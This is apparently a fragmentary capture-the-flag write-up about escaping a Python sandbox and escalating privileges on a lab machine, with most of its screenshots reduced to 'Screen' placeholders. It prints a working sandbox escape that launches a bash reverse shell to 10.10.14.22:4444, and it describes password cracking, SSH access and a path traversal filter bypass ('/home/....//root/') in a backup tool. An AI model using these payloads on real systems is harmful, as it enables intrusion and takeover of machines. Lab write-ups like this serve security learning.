Code

Screen

Nmap scan Screen

Screen Screen

https://book.hacktricks.wiki/en/generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html

Import does not work. Loop to search for a specific class when you want to obtain it dynamically.

for i, cls in enumerate(() .__class__.__bases__[0].__subclasses__()):
    print(i, cls.__name__)

Screen

It retrieves the 318th class from the object.__subclasses__() list. It instantiates this class by passing it a shell command that opens a reverse shell to 10.10.14.22:4444 as an argument.

().__class__.__bases__[0].__subclasses__()[317]("bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'", shell=True)

Screen Screen

Screen Create server http with python for download file on machine. Screen Screen

I use crackstations for cracking password. https://crackstation.net/ Screen

I connected with martin account in ssh. Screen

Escalation privilege

Screen

Backy tool: https://github.com/vdbsh/backy Backy is a tiny multiprocessing utility for file backups Screen Screen

Path Traversal https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/README.md.

I use /home/....//root/ for bypass filter. Screen Screen Screen Screen

Code#

Escalation privilege#

Code

Escalation privilege